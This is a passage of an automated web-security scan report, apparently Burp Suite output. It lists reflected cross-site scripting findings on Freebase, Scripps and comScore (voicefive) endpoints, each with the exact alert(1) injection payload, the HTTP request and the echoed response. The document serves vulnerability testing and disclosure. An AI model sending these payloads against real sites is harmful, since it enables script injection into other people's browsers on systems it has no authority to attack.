Expires: Thu, 12 May 2011 13:31:02 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:01Z;0051
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3247977<script>alert(1)</script>52d97883a5d"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:01Z;0051"
}
2.63. http://api.freebase.com/api/trans/image_thumb/en/skype [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload d16ee<script>alert(1)</script>9f14939b273 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=32&maxheight=32&mode=fillcropd16ee<script>alert(1)</script>9f14939b273 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:35 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:36 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:35Z;0020
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropd16ee<script>alert(1)</script>9f14939b273"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropd16ee<script>
...[SNIP]...
2.64. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 1bc9a<script>alert(1)</script>03308122bf6 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=32&maxheight=321bc9a<script>alert(1)</script>03308122bf6&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:12 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.011, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:13 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache01.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache01.p01.sjc1:8101;2011-05-12T13:31:12Z;0086
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "321bc9a<script>alert(1)</script>03308122bf6"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache01.p01.sjc1:8101;2011-05-12T13:31:12Z;0086"
}
2.65. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 98742<script>alert(1)</script>4e597d81c40 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=3298742<script>alert(1)</script>4e597d81c40&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:58 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.013, maxrss=8, mcs=0.0, mcu=0.0, minflt=2, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:59 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:58Z;0023
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3298742<script>alert(1)</script>4e597d81c40"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:58Z;0023"
}
2.66. http://api.freebase.com/api/trans/image_thumb/en/youtube [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 31f0b<script>alert(1)</script>51e1e21b763 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=32&maxheight=32&mode=fillcrop31f0b<script>alert(1)</script>51e1e21b763 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:31 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:32 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:31Z;0035
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop31f0b<script>alert(1)</script>51e1e21b763"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop31f0b<script>
...[SNIP]...
2.67. http://apptap.scripps.com/apptap3 [app parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the app request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 250f0'%3balert(1)//3099540a5f4 was submitted in the app parameter. This input was echoed as 250f0';alert(1)//3099540a5f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff250f0'%3balert(1)//3099540a5f4&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48363


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF250F0';ALERT(1)//3099540A5F4' ;
            //ref = document.ref
...[SNIP]...
ers' latest work"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF250F0';ALERT(1)//3099540A5F4" /* app */

s.prop16="Entertainment (NPC)" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /* city */
s.prop23="" /* state */
s.prop24="" /* zip */

s.prop30="ECP"
...[SNIP]...
2.68. http://apptap.scripps.com/apptap3 [app parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the app request parameter is copied into a JavaScript rest-of-line comment. The payload 4b22f%0aalert(1)//da968e7ee99 was submitted in the app parameter. This input was echoed as 4b22f
alert(1)//da968e7ee99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff4b22f%0aalert(1)//da968e7ee99&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48361


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF4B22F
ALERT(1)//DA968E7EE99' ;
            //ref = document.referrer ;
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t();if(s_code)document.write(s_code);
   //if(navigator.appVersion.index
...[SNIP]...
2.69. http://apptap.scripps.com/apptap3 [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the path request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a0736%3balert(1)//c6592984475 was submitted in the path parameter. This input was echoed as a0736;alert(1)//c6592984475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-pppppa0736%3balert(1)//c6592984475&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48334


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
return h;
}

function __addSlashes(n){
   var p = /[']/g;
   c = n.replace(p,"\'");
   p = /["]/g;
   c = c.replace(p,'\"');
   return c
}


var path = "ENTERTAINMENT/LOCAL/ARTICLE/HEDER-HERE-IN-THIS-SPP-PPPPPA0736;ALERT(1)//C6592984475"
var search_terms = ''

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2010 Omniture, Inc. More info available at
http://www.omniture.com */
/* You may give each page an identifying name, server
...[SNIP]...
2.70. http://apptap.scripps.com/apptap3 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the site request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 807ab%3balert(1)//eaad520ff04 was submitted in the site parameter. This input was echoed as 807ab;alert(1)//eaad520ff04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP807ab%3balert(1)//eaad520ff04&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48362


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
op6 = chunk
           if( vidx == 3 ) s.prop7 = chunk
           if( vidx == 4 ) s.prop8 = chunk
           if( vidx == 5 ) s.prop9 = chunk
           h1chunks.push( chunk )
       }
   }
   s.hier1 = h1chunks.join( ":" ) ;
   s.prop19 = "ECP807AB;ALERT(1)//EAAD520FF04:" + s.hier1 ;
   s.hier2= s.hier1

s.prop10 = '' || document.location.href.replace( /\?.*$/, '' ) ;
s.prop10 = s.prop10.replace( /https?:\/\//, '' ) ;
   s.prop10 = s.prop10.replace( /^ww
...[SNIP]...
2.71. http://apptap.scripps.com/apptap3 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa207'-alert(1)-'da0583d3123 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECPaa207'-alert(1)-'da0583d3123&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48364


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
);
}

sc_target( path, "Friday 13th double feature screens local filmmakers' latest work"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECPAA207'-ALERT(1)-'DA0583D3123" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

s.prop16="Entertainment (NPC)" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /*
...[SNIP]...
2.72. http://apptap.scripps.com/apptap3 [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the title request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1d142%3balert(1)//79efcb08617 was submitted in the title parameter. This input was echoed as 1d142;alert(1)//79efcb08617 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=1d142%3balert(1)//79efcb08617&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48270


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
(mediaName,mediaOffset);
}
function sc_mediaStop(mediaName,mediaOffset){
s.Media.stop(mediaName,mediaOffset);
}
function sc_mediaClose(mediaName){
s.Media.close(mediaName);
}

sc_target( path, "1d142;alert(1)//79efcb08617"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

...[SNIP]...
2.73. http://apptap.scripps.com/apptap3 [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b36f2'%3balert(1)//989b401414d was submitted in the title parameter. This input was echoed as b36f2';alert(1)//989b401414d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20workb36f2'%3balert(1)//989b401414d&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48335


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
Offset){
s.Media.stop(mediaName,mediaOffset);
}
function sc_mediaClose(mediaName){
s.Media.close(mediaName);
}

sc_target( path, "Friday 13th double feature screens local filmmakers' latest workb36f2';alert(1)//989b401414d"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

...[SNIP]...
2.74. http://apptap.scripps.com/apptap3 [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23503'-alert(1)-'9f9ccb9ac54 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%2923503'-alert(1)-'9f9ccb9ac54 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48363


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

s.prop16="Entertainment (NPC)23503'-alert(1)-'9f9ccb9ac54" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /* city */
s.prop23="" /* state */
s.prop24="" /* zip */

s.prop30="ECP" /* Business Unit */


s.prop43="{{AUTHOR}}"
...[SNIP]...
2.75. http://apptap.scripps.com/apptap3 [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the topic request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7b401%3balert(1)//eea6590349d was submitted in the topic parameter. This input was echoed as 7b401;alert(1)//eea6590349d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%297b401%3balert(1)//eea6590349d HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48361


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
ace( /\?.*$/, '' ) ;
s.prop10 = s.prop10.replace( /https?:\/\//, '' ) ;
   s.prop10 = s.prop10.replace( /^www\./, '' ) ;

s.prop14 = search_terms ;
s.prop16 = "Entertainment (NPC)7b401;alert(1)//eea6590349d"

if( window.yld_mgr && window.yld_mgr.slots ) {
s.prop44 = 1 ; // are there yahoo ads?
var qty = 0 ;
for( x in window.yld_mgr.slots ) {
qty
...[SNIP]...
2.76. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f55d4<script>alert(1)</script>861c9a51b7f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf55d4<script>alert(1)</script>861c9a51b7f&n=ar_int_p82806590&1305206907376 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
